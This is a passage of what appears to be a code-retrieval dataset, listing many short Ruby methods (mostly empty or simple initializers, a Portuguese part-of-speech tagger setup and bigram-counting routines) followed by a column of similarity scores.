"def initialize\n\t\tsystem \"clear\"\n\t\tputs \"Lets play hangman!\"\n \t\t@guess_count = 0\n \t\t@game_status = false\n \t\t@guessed_letters=[]\n \t\t@guessing_word=[]\n \tend",
"def analyzer(analyzer)\n @analyzer = analyzer\n self\n end",
"def initialize(grammar)\n @marked_states = nil\n @state_counter = 0\n @state_number_translator = nil\n @grammar = nil\n @grammar = grammar\n end",
"def initialize(text)\n\n tagger_model = \"pt-pos-perceptron.bin\"\n if tagger_model == \"pt-pos-maxent.bin\"\n @article_tags = ['ART']\n @verb_tags = ['V']\n @auxiliary_verb_tags = ['VAUX']\n @participle_tags = ['PCP']\n @noun_tags = ['N', 'NPROP']\n @adjective_tags = ['ADJ']\n @adverb_tags = ['ADV', 'ADV-KS' 'ADV-KS-REL']\n @pronoun_tags = ['PROPESS', 'PROSUB', 'PROADJ', 'PRO-KS', 'PRO-KS-REL', ]\n @numeral_tags = ['NUM']\n @conjunction_tags = ['KS', 'KC']\n @preposition_tags = ['PREP', 'PREP+PROPESS', 'PREP+ART']\n @interjection_tags = ['IN']\n @denotative_word_tags = ['PDEN']\n @content_word_tags = @verb_tags + @noun_tags + @adjective_tags + @adverb_tags\n @function_word_tags = @article_tags + @preposition_tags + @pronoun_tags + @conjunction_tags + @interjection_tags\n\n @functions_as_noun_tags = ['N', 'NPROP', 'PROSUB']\n @functions_as_adjective_tags = ['ADJ', 'PROADJ']\n @punctuation_tags = ['PU']\n else\n @article_tags = ['art']\n @finito_tags = ['v-fin']\n @infinitive_tags = ['v-inf']\n @participle_tags = ['v-pcp']\n @gerundio_tags = ['v-ger']\n @noun_tags = ['n', 'prop']\n @adjective_tags = ['adj', 'n-adj']\n @adverb_tags = ['adv']\n @pronoun_tags = ['pron-pers', 'pron-indp']\n @denotative_word_tags = ['pron-det']\n @numeral_tags = ['num']\n @preposition_tags = ['prp']\n @conjunction_tags = ['conj-s', 'conj-c']\n @interjection_tags = ['intj']\n @punctuation_tags = ['punc']\n @functions_as_noun_tags = ['n', 'nprop']\n @functions_as_adjective_tags = ['adj', 'n-adj']\n @verb_tags = @finito_tags + @infinitive_tags + @participle_tags + @gerundio_tags\n @content_word_tags = @verb_tags + @noun_tags + @adjective_tags + @adverb_tags\n @function_word_tags = @article_tags + @preposition_tags + @pronoun_tags + @conjunction_tags + @interjection_tags\n end\n\n @tagger = OpenNLP::POSTaggerME.new(tagger_model)\n @tokenizer = OpenNLP::TokenizerME.new(\"pt-token.bin\")\n\n @tokens = @tokenizer.tokenize(text.gsub(/(\\p{Punct})/,\" \\\\1 \"))\n @part_of_speech = @tagger.tag(@tokens).to_a\n end",
"def initialize(grid) # new objects of class BB will be created by passing a grid to init method\n\t\t@grid = grid # usual init assignment of instance to local/self\n\tend",
"def initialize()\n end",
"def set_analyzer\n #@analyzer = Analyzer.find(params[:id])\n end",
"def initialize\n \n end",
"def initialize\n @consistency_checker = ConsistencyChecker.new\n @grammar_tester = GrammarTest.new\n @fsf_learner = FewestSetFeatures.new\n @mmr_learner = MaxMismatchRanking.new\n @step_type = INDUCTION\n end",
"def set_antibiogram\n\t\t\t@antibiogram = Antibiogram.find(params[:id])\n\t\tend",
"def initialize(alma:, solr:)\n @alma = alma\n @solr = solr # Spectrum::BibRecord\n @holdings = load_holdings\n end",
"def initialize() end",
"def initialize\n @formatter = Formatter::Text\n @levels = Report::DEFAULT_LEVELS\n @analyzers = REQUIRED_ANALYZERS.dup\n\n Analyze.constants.each do |c|\n const = Analyze.const_get(c)\n\n @analyzers << const unless @analyzers.include?(const)\n end\n end",
"def init; end",
"def init; end",
"def init; end",
"def init; end",
"def initialize()\n\t\tend",
"def initialize\n\t\t\n\tend",
"def initialize(model_sentence, bank)\n @tagger = EngTagger.new\n @poem = model_sentence.capitalize\n @model_sentence = model_sentence\n @model_tags = @tagger.get_readable(model_sentence).gsub(/\\w*\\//, \"\").downcase\n @word_bank = @tagger.add_tags(bank)\n end",
"def init_graph\n Graph.new(self, skip_track: :broad)\n end",
"def create_ramfs\n super\n end",
"def analysis(analysis_id); Analysis.new(@opts, get(\"#{link('analyses')}/#{analysis_id}\")); end",
"def initialize\n @results = []\n @sentences = []\n @words = []\n# @has_new_result = false\n# $stderr.puts \"DEBUG: #{__FILE__}\"\n end",
"def init\n end",
"def init\n end",
"def init\n end",
"def init (options={})\n\n\t\t @position_in_word = options[:position_in_word]\n\t\t @pos = options[:pos]\n\t \t @lemma = options[:lemma] \n\t \t @token = options[:token] \n\t \t @word_id = options[:word_id] \n\n end",
"def initialize\n end",
"def initialize\n # kosong\n end",
"def reset_analyzer filename, dpi, result, upstream\n @raw_barcode = []\n @raw_marked_votes = []\n @filename = filename\n @upstream = upstream\n @upstream.info \"Premier Ballot2: Processing #{filename}, Target DPI=#{dpi}\"\n self.target_dpi = dpi \n end",
"def initialize(argv)\n @max = 65535\n @ceil = nil\n @rank_type = 'count'\n @sort = false\n\n args = cli argv,\n '-m --max' => lambda{ |m| @max = m.to_i },\n '-r --rank' => lambda{ |r| @rank_type = r },\n '-s --sort' => lambda{ @sort = true },\n '-c --ceil' => lambda{ |c| @ceil = c.to_i },\n '-d --debug' => lambda{ $DEBUG = true },\n '-h --help' => lambda{ show_help }\n\n directory = args.first\n\n raise \"Directory does not exist -- #{directory}\" unless File.directory?(directory)\n\n @words = Analysis::Words.new(directory)\n end",
"def initialize(arguments = {})\n inner_letter = arguments.fetch(:inner_letter, \"\").upcase\n outer_letters = arguments.fetch(:outer_letters, \"\").upcase\n if pangram?(inner_letter + outer_letters)\n @all_letters = inner_letter + outer_letters\n @inner_letter = inner_letter\n @outer_letters = outer_letters\n else\n @all_letters = get_random_pangram.chars.uniq.join\n @inner_letter = @all_letters.chars.sample\n @outer_letters = @all_letters.gsub(@inner_letter,\"\")\n end\n load_word_list\n get_total_points\n end",
"def initialize(*args)\n @_benchmarks = {}\n @_caught_content = {}\n end",
"def initialize(input_text = nil)\n @engine = LexerEngine.new\n\t\t@queue = TokenQueue.new\n engine.input = input_text unless input_text.nil?\n end",
"def initialize\n \n end",
"def initialize\n \n end",
"def load_bigrams\n bigrams = []\n\n begin\n sql = \"SELECT bigram_id, word1, word2, count FROM Bigrams;\"\n stm = @db.prepare sql\n rs = stm.execute\n\t\t while (row = rs.next) do\n\t\t id, w1, w2, c = *row\n\t\t bigrams << Bigrams.new(w1, w2, :count=>c, :id=>id)\n\t\t end\n ensure\n stm.close\n end\n\n begin \n sql = \"SELECT file_path, file_count FROM BigramFiles WHERE bigram_id = ?\"\n stm = @db.prepare sql\n\n\t\t bigrams.each do |b|\n\t\t rs = stm.execute(b.id)\n\t\t files = {}\n\t\t while (row = rs.next) do\n\t\t path, count = *row\n\t\t files[path] = count\n\t\t end\n\t\t b.files = files\n\t\t end\n ensure\n stm.close\n end\n\n return bigrams\n end",
"def initialize()\r\n\r\n end",
"def initialize\n\t\nend",
"def initialize\r\n load_word_catalog\r\n end",
"def initialize \n\t\t@alive #checking they're alive\n\t\t\tputs \"I am alive\"\n\t\t@health=150 #initialize that all mammals start at 150\n\t\tself\n\tend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\t\t\t\t\t\t\t\t\t\t\t\t\t#for each line\n\t\t\ttitle = cleanup_title(line)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#clean up title\n\t\t\tif title != nil\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#unless the title doesnt exist\n\t\t\t\twords = title.split(/\\s/)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#split the title into seperate words and remove all the stop words mentioned in the lab\n\t\t\t\twords.delete(\"a\")\n\t\t\t\twords.delete(\"an\")\n\t\t\t\twords.delete(\"and\")\n\t\t\t\twords.delete(\"by\")\n\t\t\t\twords.delete(\"for\")\n\t\t\t\twords.delete(\"from\")\n\t\t\t\twords.delete(\"in\")\n\t\t\t\twords.delete(\"of\")\n\t\t\t\twords.delete(\"on\")\n\t\t\t\twords.delete(\"or\")\n\t\t\t\twords.delete(\"out\")\n\t\t\t\twords.delete(\"the\")\n\t\t\t\twords.delete(\"to\")\n\t\t\t\twords.delete(\"with\")\n\t\t\t\t(0..words.size-2).each do |i|\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# for the size of the words array minus two because we dont want to check bigrams of the last word\n\t\t\t\t\tif $bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"].nil?\t\t\t\t\t\t\t\t\t\t#if the first layer doesnt contain the current word, add it with it's following word with a value of 1\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"].store(\"#{words[i+1]}\", 1)\n\t\t\t\t\telse\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#otherwise, increment the value of the following key word\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"] += 1\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t#p $bigrams.values.inspect\n\t\tend\n\t\t#puts mcw(\"a\")\n\t\tputs \"Finished. Bigram model built.\\n\"\n\t#rescue\n\t\t#STDERR.puts \"Could not open file\"\n\t\t#exit 4\n\tend\nend",
"def initialize()\n @memory = 0\n @variables = Array.new\n @nombres = Array.new\n @salidaF = \"\"\n end",
"def set_analysis\r\n @analysis = Analysis.find(params[:id])\r\n end",
"def initialize\n end",
"def initialize\n end"
] | [
"0.60718626",
"0.56724",
"0.5556387",
"0.55020416",
"0.5490031",
"0.5408278",
"0.53601986",
"0.5353507",
"0.5347011",
"0.52998775",
"0.52591366",
"0.5214828",
"0.5195328",
"0.5185657",
"0.51741457",
"0.51688296",
"0.51621974",
"0.51539665",
"0.51346606",
"0.5134577",
"0.5127136",
"0.50998497",
"0.509942",
"0.5095463",
"0.50804067",
"0.5076985",
"0.506083",
"0.5055892",
"0.50522375",
"0.5051439",
"0.504591",
"0.50380653",
"0.50380653",
"0.5034696",
"0.5027512",
"0.5022789",
"0.50153685",
"0.50037086",
"0.49944273",
"0.49834886",
"0.49807888",
"0.49786812",
"0.49688765",
"0.49649578",
"0.49643698",
"0.49614847",
"0.49587214",
"0.4956348",
"0.49556616",
"0.49542415",
"0.49534392",
"0.4951538",
"0.49509308",
"0.49475443",
"0.49455047",
"0.49438837",
"0.4919406",
"0.49150953",
"0.49135292",
"0.49120507",
"0.49074164",
"0.49054086",
"0.4902375",
"0.49007583",
"0.4898645",
"0.48980007",
"0.48943955",
"0.489357",
"0.489357",
"0.489357",
"0.489357",
"0.48829845",
"0.48775634",
"0.48731762",
"0.48722535",
"0.4871076",
"0.48550758",
"0.48511115",
"0.485013",
"0.485013",
"0.485013",
"0.48466346",
"0.48373127",
"0.48334852",
"0.48319805",
"0.48276538",
"0.48238415",
"0.48203272",
"0.48172122",
"0.48149422",
"0.48149422",
"0.48138538",
"0.48109257",
"0.48090565",
"0.48070565",
"0.4803068",
"0.48019272",
"0.48000968",
"0.47973192",
"0.47938436",
"0.47938436"
] | 0.0 | -1 |
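A minimal, self-contained sketch of the directory-backed bigram index that this record's positive document initializes. It folds in the [](word) lookup from the record that follows; the add helper and the sample calls are illustrative assumptions, not code from any snippet above.

class Bigrams
  # The directory is only recorded here, as in the original initializer;
  # @table counts [word1, word2] pairs and @index maps word1 to followers.
  def initialize(directory)
    @directory = directory
    @table = Hash.new(0)
    @index = Hash.new { |h, k| h[k] = [] }
  end

  # Hypothetical helper: record one observed bigram.
  def add(w1, w2)
    @table[[w1, w2]] += 1
    @index[w1] << w2 unless @index[w1].include?(w2)
  end

  # List of follower words recorded for a given word.
  def [](word)
    @index[word]
  end
end

b = Bigrams.new('corpus/')
b.add('big', 'data'); b.add('big', 'idea'); b.add('big', 'data')
b['big'] # => ["data", "idea"]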
Get list of bigrams for a given word. | def [](word)
@index[word]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_bigrams(string)\n s = string.downcase\n v = []\n (s.length-1).times{ |i|\n v[i] = s[i...i+2]\n }\n return v\n end",
"def matching_bigrams(word1)\n list = @index[word1]\n list.map{ |word2| @table[[word1,word2]] }\n end",
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def load_bigrams\n bigrams = []\n\n begin\n sql = \"SELECT bigram_id, word1, word2, count FROM Bigrams;\"\n stm = @db.prepare sql\n rs = stm.execute\n\t\t while (row = rs.next) do\n\t\t id, w1, w2, c = *row\n\t\t bigrams << Bigrams.new(w1, w2, :count=>c, :id=>id)\n\t\t end\n ensure\n stm.close\n end\n\n begin \n sql = \"SELECT file_path, file_count FROM BigramFiles WHERE bigram_id = ?\"\n stm = @db.prepare sql\n\n\t\t bigrams.each do |b|\n\t\t rs = stm.execute(b.id)\n\t\t files = {}\n\t\t while (row = rs.next) do\n\t\t path, count = *row\n\t\t files[path] = count\n\t\t end\n\t\t b.files = files\n\t\t end\n ensure\n stm.close\n end\n\n return bigrams\n end",
"def search_for (word)\n\n chars = word.split(\"\")\n all_words = chars.permutation(chars.size).map{|_chars|\n _chars.join \"\"\n }\n\n anagrams = []\n all_words.each do |w|\n anagrams.push w if @word_list[w]\n end\n\n return anagrams\n end",
"def gen_bigrams(a)\n bigrams = a.zip(a[1..-1])\n bigrams.pop # remove last useless one [lastitem, nil]\n return bigrams\nend",
"def find_bigrams(str, bigrams)\n bigrams.select { |bigram| str.include?(bigram)}\nend",
"def get_bigrams_internal(word, *args)\n http_method = :get\n path = '/word/{word}/phrasesInternal'\n path.sub!('{word}', word.to_s)\n\n # Ruby turns all key-value arguments at the end into a single hash\n # e.g. Wordnik.word.get_examples('dingo', :limit => 10, :part_of_speech => 'verb')\n # becomes {:limit => 10, :part_of_speech => 'verb'}\n last_arg = args.pop if args.last.is_a?(Hash)\n last_arg = args.pop if args.last.is_a?(Array)\n last_arg ||= {}\n\n # Look for a kwarg called :request_only, whose presence indicates\n # that we want the request itself back, not the response body\n if last_arg.is_a?(Hash) && last_arg[:request_only].present?\n request_only = true\n last_arg.delete(:request_only)\n end\n\n params = last_arg\n body ||= {}\n request = Wordnik::Request.new(http_method, path, :params => params, :body => body)\n request_only ? request : request.response.body\n end",
"def scan\n $stderr.print \"[bigrams] \"\n\n last = nil\n\n bigram_files.each do |file|\n $stderr.print \".\"\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t if last && good_bigram?(word)\n add(last, word, file)\n\t\t end\n\t\t last = word\n else\n last = nil\n end\n end\n last = nil\n end\n last = nil\n end\n\n $stderr.puts\n end",
"def anagrams(word, words)\n # TODO: check if \"words\" has anagrams of \"word\" and return them in an array\nend",
"def anagrams\n word.anagram.words.pluck(:text) - [word.text]\n end",
"def anagrams(word)\n EpicAnagram.find_anagrams(word)\n end",
"def get_anagrams(word)\n # FILL ME IN\n unless valid_word?(word)\n return \"Invalid input (string should only consist of letters).\"\n end\n counter = get_counts(word.downcase)\n if @anagrams.has_key?(counter) && @anagrams[counter].size() > 0\n return @anagrams[counter].to_a - [word.downcase]\n else\n return \"No anagrams found!\"\n end\n end",
"def load_bigrams(filename)\n #puts filename\n CSV.foreach(filename, :headers=>true) do |row|\n bigram = row['bigram']\n bigram.gsub!(' ','_')\n @bigrams << bigram\n end\n end",
"def mcw(word)\n\tif $bigrams.has_key? word\n\t\tmax = 0\n\t\tkeys = []\n\t\t$bigrams[word].each do |key, count|\n\t\t\tif count > max\n\t\t\t\tkeys = [key]\n\t\t\t\tmax = count\n\t\t\telsif count == max\n\t\t\t\tkeys << key\n\t\t\tend\n\t\tend\n\n\t\tif keys.length > 1\n\t\t\treturn keys[Random.rand(keys.length)]\n\t\telse\n\t\t\treturn keys[0]\n\t\tend\n\tend\n\treturn \"\"\nend",
"def find_anagrams( words )\r\n\tif words.empty?\r\n\t\tresult = []\r\n\telse\r\n\t\tresult = []\r\n\t\tsource = words[0]\r\n\t\twords.each do |w|\r\n\t\t\tif are_anagrams?( source, w )\r\n\t\t\t\tresult << w\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\t\r\n\treturn result\r\nend",
"def word_combos(word)\n\t\tword = word.chars.to_a\n\t\tall_word_combo = []\n\t\ti = 1\n\t\twhile i <= word.size\n\t\t\tall_word_combo << word.permutation(i).to_a\n\t\t\ti+=1\n\t\tend\n\t\treturn all_word_combo\n\tend",
"def anagrams(word, words)\n word = word.chars.sort\n words.select{|x| x.chars.sort == word}\nend",
"def anagrams(word, words)\n sorted_test_word = word.chars.sort.join\n sorted_words = words.map do |word|\n word.chars.sort.join\n end\n\n anagram_locations = sorted_words.map.with_index do |word, index|\n if word == sorted_test_word\n index\n end\n end.compact\n # sorted_words.keep_if.with_index {|word, index| word == sorted_test_word}\n anagrams = []\n anagram_locations.each do |location|\n anagrams << words[location]\n end\n anagrams\nend",
"def next_words_for(word) \n if word.nil? or word.empty?\n generator_names \n else\n name_of_last_generator_inverse = word[-1].swapcase\n generator_names.find_all{|name| name != name_of_last_generator_inverse }.map{|name| word + name }\n end\n end",
"def get_runs(word)\n word.squeeze.chars.sort.join\n end",
"def match(possible_anagrams)\nresult = []\nsplitted_word = @word.downcase.split(\"\").sort\n\npossible_anagrams.each do |element|\nif splitted_word == element.downcase.split(\"\").sort\n result << element\nend \nend\nresult\nend",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def get_matches(word)\n cur = self\n word.each_char do |character|\n modified_char = @@vowels.include?(character) ? '*' : character\n return Set.new if not cur.kids.has_key? modified_char\n cur = cur.kids[modified_char]\n end\n cur.words_here\n end",
"def group_anagrams(words)\n anagrams = {}\n words.each { |word|\n sorted_word = word.split(\"\").sort().join(\"\")\n if anagrams.has_key?(sorted_word)\n anagrams[sorted_word] << word\n else\n anagrams[sorted_word] = [word]\n end\n }\n return anagrams.values()\nend",
"def get_words\n @sentences.each_index do |i|\n s = @sentences[i]\n words = s.split(' ')\n words.each do |w|\n word = w.gsub(WORD_SANITIZE, '').downcase\n if belongs_to_known_abbreviations? word\n add_word_to_result(word, i)\n else\n add_word_to_result(word.gsub(DOT_SANITIZE, ''), i)\n end\n end\n end\n end",
"def combine_anagrams(words)\r\n\tanagrams = find_anagrams( words )\r\n\tif anagrams.empty?\r\n\t\tresult = []\r\n\telse\r\n\t\tnewWords = words - anagrams\r\n\t\tresult = [anagrams] + combine_anagrams(newWords)\r\n\tend\r\n\t\r\n\treturn result\r\n\t\r\nend",
"def anagrams(word, words)\n words.select { |w| w.chars.sort == word.chars.sort }\nend",
"def query(word)\n node = @the_node\n results = []\n word.split(\"\").each do |letter|\n next_node = node[letter]\n if next_node != nil\n node = next_node\n next\n else\n return ['']\n end\n end\n results << Word.new(word, node.final)\n results += get_childs(node).map{|s| Word.new(word) + s}\n results.select{|r| r.final}.map{|r| r.to_s }\n end",
"def group_anagrams(words)\n if words.length == 0\n return []\n end\n\n sorted_words = words.map { |word|\n word.split(\"\").sort().join(\"\")\n }\n indices = (Array.new(words.length) { |i| i }).sort { |a, b| sorted_words[a] <=> sorted_words[b] }\n\n result = []\n current_anagram_group = []\n current_anagram = sorted_words[indices[0]]\n\n indices.each { |index|\n word = words[index]\n sorted_word = sorted_words[index]\n\n if sorted_word == current_anagram\n current_anagram_group << word\n next\n end\n\n result << current_anagram_group\n current_anagram_group = [word]\n current_anagram = sorted_word\n }\n result << current_anagram_group\nend",
"def anagrams(word)\n\n dictionary = File.open(\"enable.txt\").read.split(\"\\n\")\n\n dictionary_array = word.chars.to_a\n matches = dictionary_array.permutation(word.length).to_a\n\n my_anagrams = []\n matches.each do |i|\n matches = i.join\n if dictionary.include?(matches)\n \tmy_anagrams.push(matches) \n end\n end\n my_anagrams.delete(word)\n\n return my_anagrams.sort_by(&:downcase)\nend",
"def get_anagrams(word, dict)\n return nil if dict.empty?\n word_freq = char_freq(word)\n dict.select {|entry| anagrams?(word_freq, char_freq(entry))}.sort\nend",
"def grams\n gram_equivalent / amount\n end",
"def ngrams(str)\n if ngrammer\n return ngrammer.call(str)\n end\n\n # two letter ngrams (bigrams)\n ngrams = str.each_char.each_cons(2).map(&:join)\n # runs of digits\n ngrams += str.scan(/\\d+/)\n ngrams.uniq\n end",
"def find_anagrams(target_word, array_of_words)\n array_of_anagrams = []\n\n array_of_words.each do |member|\n if member.split(//).sort == target_word.split(//).sort\n array_of_anagrams.push(member)\n else\n next\n end\n end\n array_of_anagrams\nend",
"def find_anagrams(base_word, word_list)\n word_list.select do |word|\n anagram?(base_word, word)\n end\nend",
"def get_word_results(word, label=nil)\n return [word]\n end",
"def match(array) #takes in an array of possible anagrams\n anagrams = []\n \n # iterate over array of words\n array.each do |word|\n # compare each word of array to OG word \n # determine if word is anagram\n if word.chars.sort == @word.chars.sort\n anagrams << word\n end\n end\n anagrams #return all matches/ empty array if no matches exist\n end",
"def ngram_list(str, ngram_size=@ngram_size)\n str = alphabet_only(str).split(\"\")\n ngram_list = []\n (0..str.size - ngram_size).each do |i|\n ngram = \"\"\n (0...ngram_size).each { |j| ngram << str[i + j] }\n ngram_list << ngram\n end\n ngram_list\n end",
"def anagrams(word, words)\n p words.select {|x| x.chars.sort == word.chars.sort }\nend",
"def match(array_possible_anagrams)\n matching_words=[]\n word_broken=self.word.split(\"\").sort\n array_possible_anagrams.each do |possible_match|\n #possible_match=possible.word\n possible_match_broken=possible_match.split(\"\").sort\n if possible_match_broken == word_broken\n matching_words << possible_match\n else\n end #end of if\n end #end of do\n matching_words\n end",
"def word_unscrambler(str, words)\n str = str.split('').sort.join('')\n possible = []\n words.map do |word|\n sort_word = word.split('').sort.join('')\n possible << word if word_c == str\n end\n return possible\nend",
"def match(possible_anagrams)\n anagrams = []\n possible_anagrams.each do |possible_anagram|\n if possible_anagram.split(\"\").sort == @word.split(\"\").sort\n anagrams << possible_anagram\n end\n end\n anagrams\nend",
"def find_anagrams( target_word, list_of_words )\n anagrams = []\n list_of_words.each{ |element|\n if anagram_canonical_form(element) == anagram_canonical_form(target_word)\n anagrams << element\n end\n }\n return anagrams\nend",
"def combine_anagrams(words)\n groups = []\n words.each { |word|\n inserted = false\n groups.each { |item|\n if word.isAnagram(item[0])\n item << word\n inserted = true\n end\n }\n if ! inserted\n list = []\n list << word\n groups << list\n end\n }\n return groups\nend",
"def combine_anagrams(words)\n anagrams = []\n available_words = words\n words.each do |e|\n group = []\n temp_words = []\n anagram_invariant = e.downcase.chars.sort.join\n available_words.each do |i|\n test = i.downcase.chars.sort.join\n if test == anagram_invariant\n group.push(i)\n else\n temp_words.push(i)\n end\n end\n if(!group.empty?)\n anagrams.push(group)\n end\n available_words = temp_words\n end\n return anagrams\nend",
"def words\n @phrase.split(/[^A-Za-z0-9']+/)\n end",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def anagrams(word)\n dictionary = File.readlines(Dir.pwd << \"/enable.txt\").map { |word| word.chomp }\n anagrams = []\n\n word = word.split(\"\")\n word.permutation.to_a.each do |possible_perm|\n anagrams << possible_perm.join.upcase if dictionary.include?(possible_perm.join)\n end\n anagrams\nend",
"def scramble_words(words)\n words.split(' ').map { |word| scramble(word) }.join(' ')\nend",
"def pangram_search(words, &block)\n # Bust out if we've found enough pangrams\n raise AllDone.new if @max_count != 0 && @count > @max_count\n \n h = LetterHistogram.new words\n\n # If we already have more words or more repeats, then no need to look any\n # further, we should backtrack and try something else.\n return if words.size >= @min_size && h.repeats >= @min_repeats\n\n # This pangram is somehow minimal, so pass to the block\n if h.pangram?\n @min_size = words.size if words.size < @min_size\n @min_repeats = h.repeats if h.repeats < @min_repeats\n @count += 1\n yield words,h\n return\n end\n\n # No pangram yet, find children and descend\n new_words = @word_letters.least_common words,h\n new_words.each {|w| pangram_search words + [w], &block}\n end",
"def word_unscrambler(word, dic)\n word = word.split(\"\").sort!\n anagrams = []\n\n i = 0\n while i < dic.length\n compare = dic[i].split(\"\").sort\n if word == compare\n anagrams << dic[i]\n end\n i += 1\n end\n p anagrams\nend",
"def words\n @words_array = @phrase.split(' ')\n end",
"def words\n @words ||= begin\n words = Set.new\n board_traverser.each_with_recur do |word, char, recurser|\n next unless searcher.has_child? char\n searcher.down_to char do\n words << word if searcher.on_word? && !@guessed.include?(word)\n recurser.call\n end\n end\n words.sort_by &:length\n end\n end",
"def combine_anagrams(words)\n\tresult = []\n\twords.each do |word|\n\t\ttemp_word = sort_letters(word)\n\t\tis_found = false\n\t\tresult.each do |grouped_array|\n\t\t\tif !false and sort_letters(grouped_array.last) == temp_word\n\t\t\t\tgrouped_array << word\n\t\t\t\tis_found = true\n\t\t\tend\n\t\tend\n\t\tresult << [word] if !is_found\n\tend\n\tresult\nend",
"def splits(text)\n (0..[max_word_length, text.size-1].min).\n map { |i| [text[0..i], text[i+1..text.size]] }\n end",
"def each \n if @array_words.length < 3\n return \"Length of the input_file is too small to produce trigrams\"\n end\n \n sentence = generate_sentence\n 0.upto(sentence.split.length - 1) do |x|\n yield sentence.split[x]\n end\n return sentence\n end",
"def scramble_words(words)\n words.split.map do |word|\n scramble_word(word)\n end.join(' ')\nend",
"def split(text)\n text.downcase.scan(WORDS).uniq\n end",
"def best_match(given_word)\n words = (@word_list.is_a? Array) ? @word_list : @word_list.keys\n\n word_bigrams = bigramate(given_word)\n word_hash = words.map do |key|\n [key, bigram_compare(word_bigrams, bigramate(key))]\n end\n word_hash = Hash[word_hash]\n\n # Weight by word usage, if logical\n word_hash = apply_usage_weights(word_hash) if @word_list.is_a? Hash\n\n word_hash.max_by { |_key, value| value }.first\n end",
"def words\n @phrase = @phrase.split(' ')\n end",
"def combine_anagrams(list_of_words)\n result = []\n list_of_words.each { | word |\n found = false \n for added_words in result\n if word.anagrams?(added_words[0])\n added_words << word\n puts \"==>#{added_words}\"\n found = true\n break \n end \n end\n #Add the new anagram group list\n if !found then result << [word] end\n }\n return result\nend",
"def combine_anagrams(words)\n words_hash = Hash.new{ |hash, key| hash[key] = [] }\n words.each { |word| word_key = word.downcase.chars.sort.join; words_hash[word_key] = words_hash[word_key] << word; }\n words_list = Array.new()\n words_hash.keys.each { |key| words_list << words_hash[key] }\n return words_list\nend",
"def words_for(uid)\n word_list = get_words(uid)\n\n return word_list if ngrams <= 1\n word_list.each_cons(ngrams).map { |a| a.join(' ') }\n end",
"def anagrams_for(word, array)\n array.find_all {|element| are_anagrams?(word, element)}\nend",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def mcw(word)\n\t\tif $bigrams[word] != nil\n\t\t\tmcw_num = 0\n\t\t\tmcw_key = nil\n\t\t\t# For each key in the biagram count the number of times a word after it occurs\n\t\t\t$bigrams[word].keys.each do |key|\n\t\t\t\tif $bigrams[word][key] > mcw_num\n\t\t\t\t\tmcw_num = $bigrams[word][key]\n\t\t\t\t\tmcw_key = key\n\t\t\t\tend\n\t\t\tend\n\t\t\treturn mcw_key\n\t\tend\n\t\treturn nil\nend",
"def get_tokens\n tokens = []\n start = 0\n # Presumption: if the word is not at least 4 letters long, it contains no 4-letter sequences.\n (@wordstring.length - 3).times do\n tokens << @wordstring[start,4]\n start = start + 1\n end\n return tokens\n end",
